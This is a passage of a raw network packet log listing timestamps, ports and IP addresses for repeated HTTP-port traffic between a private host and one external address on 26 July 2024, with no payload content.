Jul 26, 2024 12:57:51.289046049 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289057016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289067030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289074898 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.289083004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289099932 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.289129019 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.289880991 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289891005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289901972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289912939 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289925098 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.289928913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289938927 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289953947 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289958954 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.289966106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.289978981 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.290007114 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.290005922 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290023088 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290035963 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290039062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290041924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290045023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290046930 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290050030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290067911 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290080070 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.290117979 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.290831089 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290841103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290844917 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290854931 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290863991 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290882111 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.290887117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290889978 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290895939 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290901899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290909052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290915012 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290920973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290926933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290929079 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.290932894 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290935993 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290941000 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290942907 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.290971994 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.290993929 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.291686058 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291709900 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291723013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291738033 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291738033 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.291750908 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291763067 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291775942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291779995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.291789055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291800022 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291814089 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291815042 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.291826010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291829109 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291831017 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.291846991 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.291918039 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.307630062 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.307701111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.307830095 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.308065891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.308079004 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.308089018 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.308099985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.308109045 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.308128119 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.308166981 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.382366896 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382385969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382402897 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382416010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382426977 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382435083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.382450104 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382468939 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382493973 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.382535934 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.382555008 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382564068 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382575035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382586002 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382599115 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.382606983 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382616997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382627964 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382636070 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.382643938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.382654905 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.382679939 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.382966042 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383028984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383040905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383079052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.383193970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383203030 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383213997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383224010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383244991 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.383271933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.383450031 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383465052 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383476019 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383497953 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.383505106 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383516073 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383524895 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.383532047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383542061 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383550882 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383559942 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.383567095 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383584023 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.383610010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.383858919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383867979 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.383903027 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384026051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384036064 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384044886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384054899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384062052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384072065 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384082079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384090900 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384098053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384108067 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384135962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384155989 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384475946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384501934 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384511948 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384519100 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384529114 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384536982 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384546041 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384556055 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384562969 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384572029 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384603024 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384623051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384802103 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384812117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384821892 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384831905 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384843111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384850025 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384891033 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.384949923 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384962082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384969950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384979010 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384991884 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.384996891 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385004997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385015965 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385020971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385032892 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385039091 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385047913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385059118 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385063887 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385072947 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385083914 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385092020 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385108948 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385150909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385859013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385869980 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385879993 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385890007 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385900974 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385907888 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385916948 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385926962 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385940075 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385945082 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385952950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385962963 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385968924 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385979891 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.385987043 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.385998011 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386006117 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386013031 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.386039019 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.386569023 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386579037 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386589050 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386596918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386607885 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386616945 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386625051 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.386634111 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386645079 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386655092 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386666059 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386672974 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.386682034 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386692047 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386701107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.386708975 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.386734962 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.386758089 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.387300014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387309074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387316942 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387327909 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387336969 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387345076 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.387352943 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387362003 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387372971 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387381077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387387991 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.387397051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387413025 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.387418985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387428999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387438059 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387445927 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.387454987 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387466908 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387471914 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.387481928 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387491941 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.387496948 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.387516022 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.387541056 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.403506994 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.403563976 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.403574944 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.403609037 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.403620005 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.403644085 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.403672934 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.403680086 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.403687954 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.403697014 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.403712988 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.403755903 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.403844118 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.403891087 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.478334904 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478347063 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478357077 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478391886 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478405952 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478410959 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.478420973 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478430986 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478446960 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.478478909 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.478584051 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478594065 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478605986 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478710890 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.478739977 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478748083 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.478754997 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478765965 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478775024 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.478790998 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.478832006 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.478998899 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479008913 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479020119 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479029894 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479037046 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.479079008 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.479152918 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479198933 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.479257107 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479268074 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479305983 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.479461908 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479501009 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.479520082 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479530096 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479572058 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.479645967 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479655981 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479665041 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479686022 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.479721069 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.479911089 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479919910 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479928970 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479939938 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479945898 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.479955912 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479964972 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479974985 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.479983091 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.480021954 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.480149984 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480190992 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.480374098 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480382919 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480392933 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480402946 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480411053 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.480421066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480432987 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480437994 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.480447054 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480457067 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480468035 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480473995 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.480489016 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480494976 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.480510950 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480520010 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.480528116 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480539083 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.480552912 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.480586052 CEST	60836	80	192.168.2.6	198.46.178.145
Jul 26, 2024 12:57:51.481169939 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481178999 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481189013 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481193066 CEST	80	60836	198.46.178.145	192.168.2.6
Jul 26, 2024 12:57:51.481208086 CEST	60836	80	192.168.2.6	198.46.178.145
